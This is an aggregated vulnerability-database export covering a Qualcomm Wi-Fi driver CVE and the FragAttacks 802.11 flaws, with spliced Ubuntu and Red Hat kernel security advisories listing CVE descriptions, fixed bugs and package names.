        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-0443"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01583"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0443"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001492"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0443"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-291"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01583"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0443"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001492"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0443"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-291"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01583"
      },
      {
        "date": "2017-02-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0443"
      },
      {
        "date": "2017-02-07T00:00:00",
        "db": "BID",
        "id": "96047"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001492"
      },
      {
        "date": "2017-02-08T15:59:01.770000",
        "db": "NVD",
        "id": "CVE-2017-0443"
      },
      {
        "date": "2017-02-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-291"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01583"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0443"
      },
      {
        "date": "2017-03-07T00:02:00",
        "db": "BID",
        "id": "96047"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001492"
      },
      {
        "date": "2019-10-03T00:03:26.223000",
        "db": "NVD",
        "id": "CVE-2017-0443"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-291"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-291"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Qualcomm Wi-Fi Vulnerability that could elevate privileges in drivers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001492"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control issues",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-291"
      }
    ],
    "trust": 0.6
  }
}

var-202105-1431
Vulnerability from variot

The 802.11 standard that underpins Wi-Fi Protected Access (WPA, WPA2, and WPA3) and Wired Equivalent Privacy (WEP) doesn't require that the A-MSDU flag in the plaintext QoS header field is authenticated. Against devices that support receiving non-SSP A-MSDU frames (which is mandatory as part of 802.11n), an adversary can abuse this to inject arbitrary network packets. IEEE 802.11 The standard has vulnerabilities related to lack of certification for critical functions.Information may be tampered with. A flaw was found in the Linux kernels implementation of wifi fragmentation handling. An attacker with the ability to transmit within the wireless transmission range of an access point can abuse a flaw where previous contents of wifi fragments can be unintentionally transmitted to another device. (CVE-2020-24586) A flaw was found in the Linux kernel's WiFi implementation. An attacker within the wireless range can abuse a logic flaw in the WiFi implementation by reassembling packets from multiple fragments under different keys, treating them as valid. This flaw allows an malicious user to send a fragment under an incorrect key, treating them as a valid fragment under the new key. The highest threat from this vulnerability is to confidentiality. (CVE-2020-24587) A flaw was found in the Linux kernels wifi implementation. An attacker within wireless broadcast range can inject custom data into the wireless communication circumventing checks on the data. This can cause the frame to pass checks and be considered a valid frame of a different type. (CVE-2020-24588) Frames used for authentication and key management between the AP and connected clients. Some clients may take these redirected frames masquerading as control mechanisms from the AP. (CVE-2020-26139) A vulnerability was found in Linux kernel's WiFi implementation. An attacker within wireless range can inject a control packet fragment where the kernel does not verify the Message Integrity Check (authenticity) of fragmented TKIP frames. (CVE-2020-26141) A flaw was found in ath10k_htt_rx_proc_rx_frag_ind_hl in drivers/net/wireless/ath/ath10k/htt_rx.c in the Linux kernel WiFi implementations, where it accepts a second (or subsequent) broadcast fragments even when sent in plaintext and then process them as full unfragmented frames. The highest threat from this vulnerability is to integrity. (CVE-2020-26145) A flaw was found in ieee80211_rx_h_defragment in net/mac80211/rx.c in the Linux Kernel's WiFi implementation. This vulnerability can be abused to inject packets or exfiltrate selected fragments when another device sends fragmented frames, and the WEP, CCMP, or GCMP data-confidentiality protocol is used. The highest threat from this vulnerability is to integrity. (CVE-2020-26147) A flaw was found in the Linux kernel in certs/blacklist.c, When signature entries for EFI_CERT_X509_GUID are contained in the Secure Boot Forbidden Signature Database, the entries are skipped. This can cause a security threat and breach system integrity, confidentiality and even lead to a denial of service problem. (CVE-2020-26541) A vulnerability was found in the bluez, where Passkey Entry protocol used in Secure Simple Pairing (SSP), Secure Connections (SC) and LE Secure Connections (LESC) of the Bluetooth Core Specification is vulnerable to an impersonation attack where an active attacker can impersonate the initiating device without any previous knowledge. (CVE-2020-26558) A flaw was found in the Linux kernel. Improper access control in BlueZ may allow an authenticated user to potentially enable information disclosure via adjacent access. The highest threat from this vulnerability is to data confidentiality and integrity. (CVE-2021-0129) A flaw was found in the Linux kernel's KVM implementation, where improper handing of the VM_IO|VM_PFNMAP VMAs in KVM bypasses RO checks and leads to pages being freed while still accessible by the VMM and guest. This flaw allows users who can start and control a VM to read/write random pages of memory, resulting in local privilege escalation. The highest threat from this vulnerability is to confidentiality, integrity, and system availability. (CVE-2021-22543) A flaw was found in the Linux kernel's handling of the removal of Bluetooth HCI controllers. This flaw allows an attacker with a local account to exploit a race condition, leading to corrupted memory and possible privilege escalation. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-32399) A use-after-free flaw was found in hci_send_acl in the bluetooth host controller interface (HCI) in Linux kernel, where a local attacker with an access rights could cause a denial of service problem on the system The issue results from the object hchan, freed in hci_disconn_loglink_complete_evt, yet still used in other places. The highest threat from this vulnerability is to data integrity, confidentiality and system availability. (CVE-2021-33034) The canbus filesystem in the Linux kernel contains an information leak of kernel memory to devices on the CAN bus network link layer. An attacker with the ability to dump messages on the CAN bus is able to learn of uninitialized stack values by dumbing messages on the can bus. (CVE-2021-34693) An out-of-bounds (OOB) memory access flaw was found in fs/f2fs/node.c in the f2fs module in the Linux kernel. A bounds check failure allows a local malicious user to gain access to out-of-bounds memory leading to a system crash or a leak of internal kernel information. The highest threat from this vulnerability is to system availability. (CVE-2021-3506) A flaw double-free memory corruption in the Linux kernel HCI device initialization subsystem was found in the way user attach malicious HCI TTY Bluetooth device. A local user could use this flaw to crash the system. (CVE-2021-3564) A flaw use-after-free in function hci_sock_bound_ioctl() of the Linux kernel HCI subsystem was found in the way user calls ioct HCIUNBLOCKADDR or other way triggers race condition of the call hci_unregister_dev() together with one of the calls hci_sock_blacklist_add(), hci_sock_blacklist_del(), hci_get_conn_info(), hci_get_auth_info(). A privileged local user could use this flaw to crash the system or escalate their privileges on the system. (CVE-2021-3573) A flaw was found in the Linux kernels NFC implementation, A NULL pointer dereference and BUG leading to a denial of service can be triggered by a local unprivileged user causing a kernel panic. (CVE-2021-38208). ========================================================================== Ubuntu Security Notice USN-4997-2 June 25, 2021

linux-kvm vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 21.04

Summary:

Several security issues were fixed in the Linux kernel. This update provides the corresponding updates for the Linux KVM kernel for Ubuntu 21.04.

Norbert Slusarek discovered a race condition in the CAN BCM networking protocol of the Linux kernel leading to multiple use-after-free vulnerabilities. A local attacker could use this issue to execute arbitrary code. (CVE-2021-3609)

Piotr Krysiuk discovered that the eBPF implementation in the Linux kernel did not properly enforce limits for pointer operations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33200)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation did not properly clear received fragments from memory in some situations. A physically proximate attacker could possibly use this issue to inject packets or expose sensitive information. A physically proximate attacker could possibly use this issue to decrypt fragments. (CVE-2020-24587)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled certain malformed frames. If a user were tricked into connecting to a malicious server, a physically proximate attacker could use this issue to inject packets. (CVE-2020-24588)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled EAPOL frames from unauthenticated senders. A physically proximate attacker could inject malicious packets to cause a denial of service (system crash). (CVE-2020-26139)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation did not properly verify certain fragmented frames. A physically proximate attacker could possibly use this issue to inject or decrypt packets. A physically proximate attacker could use this issue to inject packets. (CVE-2020-26145)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation could reassemble mixed encrypted and plaintext fragments. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23133)

Or Cohen and Nadav Markus discovered a use-after-free vulnerability in the nfc implementation in the Linux kernel. (CVE-2021-23134)

Manfred Paul discovered that the extended Berkeley Packet Filter (eBPF) implementation in the Linux kernel contained an out-of-bounds vulnerability. A local attacker could use this issue to execute arbitrary code. (CVE-2021-31440)

Piotr Krysiuk discovered that the eBPF implementation in the Linux kernel did not properly prevent speculative loads in certain situations. A local attacker could use this to expose sensitive information (kernel memory). An attacker could use this issue to possibly execute arbitrary code. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-3506)

Mathias Krause discovered that a null pointer dereference existed in the Nitro Enclaves kernel driver of the Linux kernel. (CVE-2021-3543)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 21.04: linux-image-5.11.0-1009-kvm 5.11.0-1009.9 linux-image-kvm 5.11.0.1009.9

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://ubuntu.com/security/notices/USN-4997-2 https://ubuntu.com/security/notices/USN-4997-1 CVE-2020-24586, CVE-2020-24587, CVE-2020-24588, CVE-2020-26139, CVE-2020-26141, CVE-2020-26145, CVE-2020-26147, CVE-2021-23133, CVE-2021-23134, CVE-2021-31440, CVE-2021-31829, CVE-2021-32399, CVE-2021-33034, CVE-2021-33200, CVE-2021-3506, CVE-2021-3543, CVE-2021-3609

Package Information: https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9

. Bugs fixed (https://bugzilla.redhat.com/):

2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value

  1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Moderate: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2021:4356-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:4356 Issue date: 2021-11-09 CVE Names: CVE-2020-0427 CVE-2020-24502 CVE-2020-24503 CVE-2020-24504 CVE-2020-24586 CVE-2020-24587 CVE-2020-24588 CVE-2020-26139 CVE-2020-26140 CVE-2020-26141 CVE-2020-26143 CVE-2020-26144 CVE-2020-26145 CVE-2020-26146 CVE-2020-26147 CVE-2020-27777 CVE-2020-29368 CVE-2020-29660 CVE-2020-36158 CVE-2020-36386 CVE-2021-0129 CVE-2021-3348 CVE-2021-3489 CVE-2021-3564 CVE-2021-3573 CVE-2021-3600 CVE-2021-3635 CVE-2021-3659 CVE-2021-3679 CVE-2021-3732 CVE-2021-20194 CVE-2021-20239 CVE-2021-23133 CVE-2021-28950 CVE-2021-28971 CVE-2021-29155 CVE-2021-29646 CVE-2021-29650 CVE-2021-31440 CVE-2021-31829 CVE-2021-31916 CVE-2021-33200 ==================================================================== 1.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64 Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, x86_64

Security Fix(es): * kernel: out-of-bounds reads in pinctrl subsystem (CVE-2020-0427) * kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24502) * kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24503) * kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24504) * kernel: Fragmentation cache not cleared on reconnection (CVE-2020-24586) * kernel: Reassembling fragments encrypted under different keys (CVE-2020-24587) * kernel: wifi frame payload being parsed incorrectly as an L2 frame (CVE-2020-24588) * kernel: Forwarding EAPOL from unauthenticated wifi client (CVE-2020-26139) * kernel: accepting plaintext data frames in protected networks (CVE-2020-26140) * kernel: not verifying TKIP MIC of fragmented frames (CVE-2020-26141) * kernel: accepting fragmented plaintext frames in protected networks (CVE-2020-26143) * kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header (CVE-2020-26144) * kernel: accepting plaintext broadcast fragments as full frames (CVE-2020-26145) * kernel: powerpc: RTAS calls can be used to compromise kernel integrity (CVE-2020-27777) * kernel: locking inconsistency in tty_io.c and tty_jobctrl.c can lead to a read-after-free (CVE-2020-29660) * kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function via a long SSID value (CVE-2020-36158) * kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() (CVE-2020-36386) * kernel: Improper access control in BlueZ may allow information disclosure vulnerability. (CVE-2021-0129) * kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c (CVE-2021-3348) * kernel: Linux kernel eBPF RINGBUF map oversized allocation (CVE-2021-3489) * kernel: double free in bluetooth subsystem when the HCI device initialization fails (CVE-2021-3564) * kernel: use-after-free in function hci_sock_bound_ioctl() (CVE-2021-3573) * kernel: eBPF 32-bit source register truncation on div/mod (CVE-2021-3600) * kernel: DoS in rb_per_cpu_empty() (CVE-2021-3679) * kernel: Mounting overlayfs inside an unprivileged user namespace can reveal files (CVE-2021-3732) * kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt() (CVE-2021-20194) * kernel: Race condition in sctp_destroy_sock list_del (CVE-2021-23133) * kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode (CVE-2021-28950) * kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c (CVE-2021-28971) * kernel: protection can be bypassed to leak content of kernel memory (CVE-2021-29155) * kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c (CVE-2021-29646) * kernel: lack a full memory barrier may lead to DoS (CVE-2021-29650) * kernel: local escalation of privileges in handling of eBPF programs (CVE-2021-31440) * kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory (CVE-2021-31829) * kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier (CVE-2021-33200) * kernel: reassembling encrypted fragments with non-consecutive packet numbers (CVE-2020-26146) * kernel: reassembling mixed encrypted/plaintext fragments (CVE-2020-26147) * kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check (CVE-2020-29368) * kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50 (CVE-2021-3635) * kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c (CVE-2021-3659) * kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure (CVE-2021-20239) * kernel: out of bounds array access in drivers/md/dm-ioctl.c (CVE-2021-31916)

  1. Solution:

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.5 Release Notes linked from the References section.

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1509204 - dlm: Add ability to set SO_MARK on DLM sockets 1793880 - Unreliable RTC synchronization (11-minute mode) 1816493 - [RHEL 8.3] Discard request from mkfs.xfs takes too much time on raid10 1900844 - CVE-2020-27777 kernel: powerpc: RTAS calls can be used to compromise kernel integrity 1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check 1906522 - CVE-2020-29660 kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free 1912683 - CVE-2021-20194 kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt() 1913348 - CVE-2020-36158 kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function in drivers/net/wireless/marvell/mwifiex/join.c via a long SSID value 1915825 - Allow falling back to genfscon labeling when the FS doesn't support xattrs and there is a fs_use_xattr rule for it 1919893 - CVE-2020-0427 kernel: out-of-bounds reads in pinctrl subsystem. 1921958 - CVE-2021-3348 kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c 1923636 - CVE-2021-20239 kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure 1930376 - CVE-2020-24504 kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers 1930379 - CVE-2020-24502 kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers 1930381 - CVE-2020-24503 kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers 1933527 - Files on cifs mount can get mixed contents when underlying file is removed but inode number is reused, when mounted with 'serverino' and 'cache=strict ' 1939341 - CNB: net: add inline function skb_csum_is_sctp 1941762 - CVE-2021-28950 kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode 1941784 - CVE-2021-28971 kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c 1945345 - CVE-2021-29646 kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c 1945388 - CVE-2021-29650 kernel: lack a full memory barrier upon the assignment of a new table value in net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h may lead to DoS 1946965 - CVE-2021-31916 kernel: out of bounds array access in drivers/md/dm-ioctl.c 1948772 - CVE-2021-23133 kernel: Race condition in sctp_destroy_sock list_del 1951595 - CVE-2021-29155 kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory 1953847 - [ethtool] The NLM_F_MULTI should be used for NLM_F_DUMP 1954588 - RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps. 1957788 - CVE-2021-31829 kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory 1959559 - CVE-2021-3489 kernel: Linux kernel eBPF RINGBUF map oversized allocation 1959642 - CVE-2020-24586 kernel: Fragmentation cache not cleared on reconnection 1959654 - CVE-2020-24587 kernel: Reassembling fragments encrypted under different keys 1959657 - CVE-2020-24588 kernel: wifi frame payload being parsed incorrectly as an L2 frame 1959663 - CVE-2020-26139 kernel: Forwarding EAPOL from unauthenticated wifi client 1960490 - CVE-2020-26140 kernel: accepting plaintext data frames in protected networks 1960492 - CVE-2020-26141 kernel: not verifying TKIP MIC of fragmented frames 1960496 - CVE-2020-26143 kernel: accepting fragmented plaintext frames in protected networks 1960498 - CVE-2020-26144 kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header 1960500 - CVE-2020-26145 kernel: accepting plaintext broadcast fragments as full frames 1960502 - CVE-2020-26146 kernel: reassembling encrypted fragments with non-consecutive packet numbers 1960504 - CVE-2020-26147 kernel: reassembling mixed encrypted/plaintext fragments 1960708 - please add CAP_CHECKPOINT_RESTORE to capability.h 1964028 - CVE-2021-31440 kernel: local escalation of privileges in handling of eBPF programs 1964139 - CVE-2021-3564 kernel: double free in bluetooth subsystem when the HCI device initialization fails 1965038 - CVE-2021-0129 kernel: Improper access control in BlueZ may allow information disclosure vulnerability. 1965360 - kernel: get_timespec64 does not ignore padding in compat syscalls 1965458 - CVE-2021-33200 kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier 1966578 - CVE-2021-3573 kernel: use-after-free in function hci_sock_bound_ioctl() 1969489 - CVE-2020-36386 kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() in net/bluetooth/hci_event.c 1971101 - ceph: potential data corruption in cephfs write_begin codepath 1972278 - libceph: allow addrvecs with a single NONE/blank address 1974627 - [TIPC] kernel BUG at lib/list_debug.c:31! 1975182 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer [rhel-8.5.0] 1975949 - CVE-2021-3659 kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c 1976679 - blk-mq: fix/improve io scheduler batching dispatch 1976699 - [SCTP]WARNING: CPU: 29 PID: 3165 at mm/page_alloc.c:4579 __alloc_pages_slowpath+0xb74/0xd00 1976946 - CVE-2021-3635 kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50 1976969 - XFS: followup to XFS sync to upstream v5.10 (re BZ1937116) 1977162 - [XDP] test program warning: libbpf: elf: skipping unrecognized data section(16) .eh_frame 1977422 - Missing backport of IMA boot aggregate calculation in rhel 8.4 kernel 1977537 - RHEL8.5: Update the kernel workqueue code to v5.12 level 1977850 - geneve virtual devices lack the NETIF_F_FRAGLIST feature 1978369 - dm writecache: sync with upstream 5.14 1979070 - Inaccessible NFS server overloads clients (native_queued_spin_lock_slowpath connotation?) 1979680 - Backport openvswitch tracepoints 1981954 - CVE-2021-3600 kernel: eBPF 32-bit source register truncation on div/mod 1986138 - Lockd invalid cast to nlm_lockowner 1989165 - CVE-2021-3679 kernel: DoS in rb_per_cpu_empty() 1989999 - ceph omnibus backport for RHEL-8.5.0 1991976 - block: fix New warning in nvme_setup_discard 1992700 - blk-mq: fix kernel panic when iterating over flush request 1995249 - CVE-2021-3732 kernel: overlayfs: Mounting overlayfs inside an unprivileged user namespace can reveal files 1996854 - dm crypt: Avoid percpu_counter spinlock contention in crypt_page_alloc()

  1. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source: kernel-4.18.0-348.el8.src.rpm

aarch64: bpftool-4.18.0-348.el8.aarch64.rpm bpftool-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-4.18.0-348.el8.aarch64.rpm kernel-core-4.18.0-348.el8.aarch64.rpm kernel-cross-headers-4.18.0-348.el8.aarch64.rpm kernel-debug-4.18.0-348.el8.aarch64.rpm kernel-debug-core-4.18.0-348.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debug-devel-4.18.0-348.el8.aarch64.rpm kernel-debug-modules-4.18.0-348.el8.aarch64.rpm kernel-debug-modules-extra-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm kernel-devel-4.18.0-348.el8.aarch64.rpm kernel-headers-4.18.0-348.el8.aarch64.rpm kernel-modules-4.18.0-348.el8.aarch64.rpm kernel-modules-extra-4.18.0-348.el8.aarch64.rpm kernel-tools-4.18.0-348.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-tools-libs-4.18.0-348.el8.aarch64.rpm perf-4.18.0-348.el8.aarch64.rpm perf-debuginfo-4.18.0-348.el8.aarch64.rpm python3-perf-4.18.0-348.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm

noarch: kernel-abi-stablelists-4.18.0-348.el8.noarch.rpm kernel-doc-4.18.0-348.el8.noarch.rpm

ppc64le: bpftool-4.18.0-348.el8.ppc64le.rpm bpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-4.18.0-348.el8.ppc64le.rpm kernel-core-4.18.0-348.el8.ppc64le.rpm kernel-cross-headers-4.18.0-348.el8.ppc64le.rpm kernel-debug-4.18.0-348.el8.ppc64le.rpm kernel-debug-core-4.18.0-348.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debug-devel-4.18.0-348.el8.ppc64le.rpm kernel-debug-modules-4.18.0-348.el8.ppc64le.rpm kernel-debug-modules-extra-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm kernel-devel-4.18.0-348.el8.ppc64le.rpm kernel-headers-4.18.0-348.el8.ppc64le.rpm kernel-modules-4.18.0-348.el8.ppc64le.rpm kernel-modules-extra-4.18.0-348.el8.ppc64le.rpm kernel-tools-4.18.0-348.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-tools-libs-4.18.0-348.el8.ppc64le.rpm perf-4.18.0-348.el8.ppc64le.rpm perf-debuginfo-4.18.0-348.el8.ppc64le.rpm python3-perf-4.18.0-348.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm

s390x: bpftool-4.18.0-348.el8.s390x.rpm bpftool-debuginfo-4.18.0-348.el8.s390x.rpm kernel-4.18.0-348.el8.s390x.rpm kernel-core-4.18.0-348.el8.s390x.rpm kernel-cross-headers-4.18.0-348.el8.s390x.rpm kernel-debug-4.18.0-348.el8.s390x.rpm kernel-debug-core-4.18.0-348.el8.s390x.rpm kernel-debug-debuginfo-4.18.0-348.el8.s390x.rpm kernel-debug-devel-4.18.0-348.el8.s390x.rpm kernel-debug-modules-4.18.0-348.el8.s390x.rpm kernel-debug-modules-extra-4.18.0-348.el8.s390x.rpm kernel-debuginfo-4.18.0-348.el8.s390x.rpm kernel-debuginfo-common-s390x-4.18.0-348.el8.s390x.rpm kernel-devel-4.18.0-348.el8.s390x.rpm kernel-headers-4.18.0-348.el8.s390x.rpm kernel-modules-4.18.0-348.el8.s390x.rpm kernel-modules-extra-4.18.0-348.el8.s390x.rpm kernel-tools-4.18.0-348.el8.s390x.rpm kernel-tools-debuginfo-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-core-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-debuginfo-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-devel-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-modules-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-modules-extra-4.18.0-348.el8.s390x.rpm perf-4.18.0-348.el8.s390x.rpm perf-debuginfo-4.18.0-348.el8.s390x.rpm python3-perf-4.18.0-348.el8.s390x.rpm python3-perf-debuginfo-4.18.0-348.el8.s390x.rpm

x86_64: bpftool-4.18.0-348.el8.x86_64.rpm bpftool-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-4.18.0-348.el8.x86_64.rpm kernel-core-4.18.0-348.el8.x86_64.rpm kernel-cross-headers-4.18.0-348.el8.x86_64.rpm kernel-debug-4.18.0-348.el8.x86_64.rpm kernel-debug-core-4.18.0-348.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debug-devel-4.18.0-348.el8.x86_64.rpm kernel-debug-modules-4.18.0-348.el8.x86_64.rpm kernel-debug-modules-extra-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm kernel-devel-4.18.0-348.el8.x86_64.rpm kernel-headers-4.18.0-348.el8.x86_64.rpm kernel-modules-4.18.0-348.el8.x86_64.rpm kernel-modules-extra-4.18.0-348.el8.x86_64.rpm kernel-tools-4.18.0-348.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-tools-libs-4.18.0-348.el8.x86_64.rpm perf-4.18.0-348.el8.x86_64.rpm perf-debuginfo-4.18.0-348.el8.x86_64.rpm python3-perf-4.18.0-348.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 8):

